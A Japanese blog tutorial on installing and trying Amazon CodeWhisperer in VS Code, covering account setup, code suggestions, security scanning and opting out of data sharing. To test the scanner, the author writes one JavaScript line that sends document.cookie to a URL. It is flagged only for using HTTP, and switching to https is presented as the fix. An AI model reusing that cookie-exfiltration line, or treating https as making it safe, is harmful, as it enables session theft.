自分だけのクイズを作成しよう - Quipha
スポンサーリンク

Amazon CodeWhispererを試してみた

Amazon CodeWhispererを試してみた AI

当サイトではアフィリエイト広告を利用しています。

スポンサーリンク

はじめに

今回は、AIコーディング支援サービスである、Amazon CodeWhispererを試してみました。

類似サービスのGitHub Copilotについて、試してみた記事も参考にしてください。

AIを活用することにより、初心者の方でもプログラミングに対するハードルは下がると思いますし、ベテランエンジニアでも不具合対応やよりよいコードを提案してもらえたらとても便利だと思います。

AIにコーディングをサポートしてもらうのが当たり前になっていくでしょう。

Amazon CodeWhispererについて

Amazon CodeWhispererは、開発環境 (IDE) でリアルタイムのコード提案を行ってくれます。

2022年にプレビュー版が公開されましたが、今回正式版になりました。

AI コードジェネレーター - Amazon CodeWhisperer - AWS
Amazon CodeWhisperer は AI コードジェネレーターであり支援サービスでもあり、IDE に行全体および全関数のコードの提案を生成して、より多くのことをより迅速にこなすのに役立ちます。

個人の場合は無料で利用することができます。
また、コードのセキュリティスキャンを行うことができます。

サポートされている言語は現時点で以下です。

Python, Java, JavaScript, TypeScript, C#, Rust, Go, Ruby, Scala, Kotlin, PHP, C, C++, Shell Scripting, SQL

コードセキュリティスキャンは、現時点で以下の言語に対応しています。

Python, Java, JavaScript

今回は、個人利用ですので無料版を試します。
別途、有料のプロフェッショナル版もあります。

AWSアカウントを持っている必要はなく、メールアドレスのみで利用することができます。

インストール

様々なIDEをサポートしていますが、今回はVS Codeを利用します。
VS Codeのインストール方法は、以下の記事にまとめましたのでご覧ください。

VS Codeのオススメ設定や拡張機能などは、以下の記事にまとめました。

VS Codeを起動します。
拡張機能を開き、「AWS Toolkit」をインストールします。

AWS Toolkit

アカウント登録

AWSパネルを開き、「Connect to AWS to Get Started…」をクリックします。

VS Code Connect to AWS to Get Started...

「Use a personal email to sign up and sign in with AWS builder ID」を選択します。

VS Code Use a personal email to sign up and sign in with AWS builder ID

「Copy Code and Proceed」をクリックし、コードをコピーします。

Copy Code and Proceed

Webサイトを開きます。

Code Webサイトを開く

先ほどコピーしたコードを入力します。

AWS authorize request

メールアドレスを入力し、AWSビルダーIDを作成します。

AWS ビルダーIDの作成

名前を入力します。
名前は他のユーザにも表示される可能性があるとのことです。

AWS Create your AWS Builder ID

メールアドレスに検証コードが届きますので入力します。

AWS Email verification

パスワードを設定します。

AWS パスワードを選択

「Allow」をクリックします。

これで使う準備が完了しました。

AWS Toolkit for VSCode
スポンサーリンク

コーディング

それでは試してみましょう。
「Resume Auto-Suggestions」をクリックし、有効にします。

Resume Auto-Suggestions

コーディングを行うと、コードの提案を行ってくれました。

Amazon CodeWhisperer コード提案

セキュリティスキャンも試してみましょう。
スキャンしたいソースコードを開き、「Run Security Scan」をクリックします。

Amazon CodeWhisperer Run Security Scan

適当なコードを書きました。

location.href = 'http://chigusa-web.com/?cookie=' + document.cookie;

一つ問題を発見してくれました。

Amazon CodeWhisperer 問題発見

暗号化されていないための警告です。コードをhttpsに変更したところ、改善されました。

CWE-319 - Insecure connection using unencrypted protocol: Connections that use insecure protocols transmit data in cleartext. This introduces a risk of exposing sensitive data to third parties.

データの共有について

CodeWhispererは、AWSのサービス改善の目的で、使用状況とコンテンツに関するデータを保存する場合があります。

Sharing your data with AWS - CodeWhisperer
Discusses sharing your CodeWhisperer data with AWS.

VS Codeで無効にする方法は以下です。

テレメトリの共有

「Enable AWS Toolkit to send usage data to AWS.」のチェックをオフにします。

Amazon CodeWhisperer Enable AWS Toolkit to send usage data to AWS

コンテンツの共有

「Share CodeWhisperer Content With AWS」のチェックをオフにします。

Amazon CodeWhisperer Share CodeWhisperer Content With AWS

注意点

提案されたコードが正しいかどうかは、必ず確認する必要があります。
不具合・脆弱性がある場合や、提案されたコードよりもっと良いコードがあるかもしれません。

AI全般に言えることですが、正確性は自分で判断しましょう。

さいごに

今回は、AIコーディング支援サービスである、Amazon CodeWhispererを試してみました。
コーディングをするのが便利になるでしょう。

是非試してみてください。

\オススメ/
AIツール
スポンサーリンク
この記事を共有
千草をフォローする
管理人

現役のITエンジニア。
気ままにコードや技術情報をまとめています。
Webアプリ/Windows・Macアプリ/モバイルアプリ/機械学習やIoT他。
(Java, PHP, Javascript, Swift, Python, C#, 他)
個人開発:Clibor, Quipha, TXT-Crypter
Kindle本: Laravel9 実践入門, 他

千草をフォローする

個人開発

Cliborはシンプルで高機能なクリップボード履歴ソフトです。
Mac版も公開しています。

自分だけの問題集や問題を作成し、クイズを行い学習に活用しましょう。

簡単にテキストを暗号・復号でき、秘密情報を守ります。

便利なツールを公開しています。
是非、活用してください!

チグサウェブ

コメント

タイトルとURLをコピーしました